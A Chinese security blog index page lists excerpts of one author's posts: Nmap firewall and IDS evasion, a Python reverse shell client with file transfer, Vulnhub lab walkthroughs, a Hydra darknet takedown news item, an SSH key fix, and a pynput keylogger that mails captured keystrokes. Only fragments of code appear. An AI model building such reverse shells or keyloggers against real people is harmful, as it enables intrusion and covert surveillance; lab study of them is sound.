2022年4月8日
通过合适的选项让NMAP扫描目标时规避防火墙与入侵检测系统的检测
摘要: 虽然NMAP扫描目标时,可以用-sS选项实现半开放TCP扫描,或者使用NULL、FIN 和 Xmas 扫描方式来绕过一些防火墙的技术,但是,还有另一种非常常见的防火墙配置,必须知道如何绕过它,也就是Windows 主机自带的防火墙。 典型的 Windows 主机将使用其默认防火墙阻止所有 ICMP 阅读全文
posted @ 2022-04-08 13:05 Jason_huawen 阅读(433) 评论(0) 推荐(0) 编辑
利用Python实现反向Shell的文件上传与下载
摘要: 本文代码是基于此前的代码的进一步功能增强,之前代码主要实现命令的执行以及结果的回送,本文代码主要实现文件的下载,这里需要注意在客户端以及服务端的编码的处理,否则会出现此类报错,而且两端都要做编码处理。 服务端: import socketimport sysimport json #该模块用于对传输 阅读全文
posted @ 2022-04-08 10:32 Jason_huawen 阅读(142) 评论(0) 推荐(0) 编辑
2022年4月7日
靶机Raven 1#攻略
摘要: 目标:Raven 1#(Vulnhub) 首先通过扫描Kali Linux所在的本地网络识别目标的IP地址: # nmap -sn 192.168.140.0/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-07 03:53 EDT Nma 阅读全文
posted @ 2022-04-07 16:37 Jason_huawen 阅读(227) 评论(0) 推荐(0) 编辑
利用JSON对数据进行序列化(Serialization)实现客户端与服务端的可靠传输
摘要: 本代码的主要环节在于实现客户端与服务端的可靠传输,方法是利用JSON对传输的数据进行封装。 在发送端,利用socket发送数据之前,先将数据封装为json格式。而在接收端恰恰相反。 在接收端需要加一个判断ValueError,如果说捕捉到ValueError异常,说明数据传输还没有完成,导致JSON 阅读全文
posted @ 2022-04-07 10:22 Jason_huawen 阅读(368) 评论(0) 推荐(0) 编辑
2022年4月6日
靶机Kioptrix: Level 1.3 (#4)攻略
摘要: 首先扫描目标所在网络识别出目标的IP地址: # nmap -sn 192.168.140.0/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-06 03:22 EDT Nmap scan report for 192.168.140.1 H 阅读全文
posted @ 2022-04-06 16:26 Jason_huawen 阅读(597) 评论(0) 推荐(0) 编辑
利用Python实现反向Shell客户端
摘要: import subprocess import optparse import sys import socket class ReverseShell: def __init__(self, server_ip, port): self.server_ip = server_ip self.po 阅读全文
posted @ 2022-04-06 12:15 Jason_huawen 阅读(118) 评论(0) 推荐(0) 编辑
2022年4月5日
德国关闭俄罗斯暗网市场Hydra
摘要: 德国警方周二表示,他们已经关闭了全球最大的非法暗网市场 Hydra 的服务器,并没收了价值 2300 万欧元(2500 万美元)的比特币。BKA联邦警察在一份声明中说,嫌疑人正在接受调查,罪名是“以商业方式在互联网上运营犯罪交易平台”。BKA 表示,对俄罗斯非法市场的调查于 2021 年 8 月开始 阅读全文
posted @ 2022-04-05 20:58 Jason_huawen 阅读(3) 评论(0) 推荐(0) 编辑
SSH登录时"no matching host key type found. Their offer: ssh-rsa,ssh-dss"的错误解决方法
摘要: 问题描述 在利用SSH登录某目标时,出现下述报错: # ssh loneferret@192.168.140.146 Unable to negotiate with 192.168.140.146 port 22: no matching host key type found. Their of 阅读全文
posted @ 2022-04-05 12:50 Jason_huawen 阅读(20234) 评论(1) 推荐(3) 编辑
靶机KioptrixLevel 1.2 (#3)攻略
摘要: 将Kioptrix Level 1.2虚拟机文件导入VMWARE后,并将其网卡的网络改为NAT模式(详细步骤可见其他博文) 因为不知道目标的IP地址,因此第一步就需要通过扫描网络(与攻击机器Kali Linux在同一个网络)识别出目标的IP地址: # nmap -sn 192.168.140.0/2 阅读全文
posted @ 2022-04-05 12:45 Jason_huawen 阅读(468) 评论(0) 推荐(0) 编辑
利用Python的pynput第三方模块实现键盘记录器
摘要: 代码主要分为三个部分: 1. 利用Pynput的Keyboard拦截键盘的敲键 2. 将截获的敲键写入变量中以作后续的处理 3. 通过SMTPLIB模块将上述变量中的数据以邮件方式发送 from pynput import keyboard #pynput是第三方模块,需要pip install p 阅读全文
posted @ 2022-04-05 11:14 Jason_huawen 阅读(420) 评论(0) 推荐(0) 编辑